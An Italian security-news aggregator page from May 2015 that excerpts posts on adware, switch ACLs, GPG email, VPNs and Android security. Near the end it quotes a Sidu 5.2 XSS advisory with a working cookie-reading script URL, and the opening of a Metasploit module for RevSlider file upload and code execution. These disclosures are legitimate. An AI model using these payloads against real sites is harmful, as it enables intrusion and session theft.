Adware, i nemici della security online: come difendersi

26 maggio 2015 - Fonte: http://www.mondotecno.com

adware

Al pari di malware, rogue software ed i più classici worm, è raro trovare un solo navigatore del Web che non abbia conoscenza, seppur superficiale, degli adware, recentemente ancora più in ascesa rispetto ai...

L'articolo Adware, i nemici della security online: come difendersi sembra essere il primo su Mondo Tecno.

...

Leggi il seguito »

Semplici ACL su switch HP Procurve

24 maggio 2015 - Fonte: http://www.danielelonghi.com

Semplici ACL su switch HP Procurve
D.L. Blog

Come configurare delle semplici ACL su switch HP Procurve per limitare il traffico dati tra VLAN differenti.

Semplici ACL su switch HP Procurve
D.L. Blog

...

Leggi il seguito »

Trasformare un device Android in telecamera di sicurezza con ReCam

24 maggio 2015 - Fonte: http://www.mondotecno.com

sicurezza

Non si tratta di una prerogativa dei soli dispositivi ispirati all’ormai popolare concept dell’Internet of Things, in cui uno o più device smart si prendono cura automaticamente dei nostri spazi abitativi (domotica), automatizzando anche...

L'articolo Trasformare un device Android in telecamera di sicurezza con ReCam sembra essere il primo su Mondo Tecno.

...

Leggi il seguito »

encrypt/decript e-mail con GPG

24 maggio 2015 - Fonte: http://www.mmbarabba.it

Devo ammettere che poter criptare il contenuto di una email mi ha sempre affascinato, non nascondo nulla di particolare ma solo per il fatto che la mia privacy viene rispettata nel lungo tragitto che percorre la mia lettera elettronica.

Haimè c’è contro il fatto che spesso la pigrizia non favorisce questo processo e così posso scambiarmi le email criptate con pochi e riservati amici che condividono la stessa passione.

Quanto seguirà potrà soddisfare la nostra richiesta di criptare e decriptare le mail su diversi sistemi operativi e usando diversi programmi ma non utilizzando lo standard per PGP/MIME, come ci ricorda la bibbia di mutt.

In un mondo in cui la gran parte...

Leggi il seguito »

Come testare le connessioni e la rete domestica con i tool

23 maggio 2015 - Fonte: http://www.mondotecno.com

E se qualcuno sta utilizzando la vostra connessione a vostra insaputa? Non dovete mica chiamare la polizia postale per denunciarlo, però potete bloccarlo. Prima però dovete testare la vostra rete con alcuni tool se...

L'articolo Come testare le connessioni e la rete domestica con i tool sembra essere il primo su Mondo Tecno.

...

Leggi il seguito »

Android, in arrivo nuova app per sicurezza contro estorsione dati

22 maggio 2015 - Fonte: http://www.mondotecno.com

android

E’ in arrivo un’app in grado di porre definitivamente fine, nel caso specifico sugli OS di derivazione Android, dei cosiddetti RIG attack, (runtime information gathering), sviluppati da cyberpirati allo scopo di nuocere ai device...

L'articolo Android, in arrivo nuova app per sicurezza contro estorsione dati sembra essere il primo su Mondo Tecno.

...

Leggi il seguito »

VyprVPN, VPN gratuita internazionale per smartphone

20 maggio 2015 - Fonte: http://www.mondotecno.com

vpn

L’attenzione alle VPN (Virtual Private Network) è in forte ascesa a causa delle migliaia di soluzioni attualmente disponibili, e di indiscussa validità. Tuttavia, la maggior parte di tali opzioni è basata fondamentalmente su infrastrutture...

L'articolo VyprVPN, VPN gratuita internazionale per smartphone sembra essere il primo su Mondo Tecno.

...

Leggi il seguito »

Proxy Switchy Omega, come usare proxy multipli su Google Chrome

16 maggio 2015 - Fonte: http://www.mondotecno.com

proxy

La sempre maggiore necessità e popolarità dei servizi online proxy, per ragioni di privacy personale, metodo di reazione alla censura o semplicemente per sbloccare contenuti la cui visualizzazione è impedita nel proprio paese di...

L'articolo Proxy Switchy Omega, come usare proxy multipli su Google Chrome sembra essere il primo su Mondo Tecno.

...

Leggi il seguito »

Sidu 5.2 Admin XSS Vulnerability

15 maggio 2015 - Fonte: http://www.mondounix.com
Affected Vendor:
www.topnew.net/sidu/
 
Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org
 
Source:
http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt
 
Product:
Sidu version 5.2 is a web based database front-end administration tool.
 
Advisory Information:
=====================================================
Sidu 5.2 is vulnerable to cross site scripting attacks.
 
Exploit code:
==============
 
http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E
 
Disclosure Timeline:
==================================
 
Vendor Notification  May 12, 2015
May 13, 2015: Public Disclosure
 
Severity...

Leggi il seguito »

WordPress RevSlider 3.0.95 File Upload / Execute

15 maggio 2015 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The
        vulnerability allows for arbitrary file upload and remote code execution.
...

Leggi il seguito »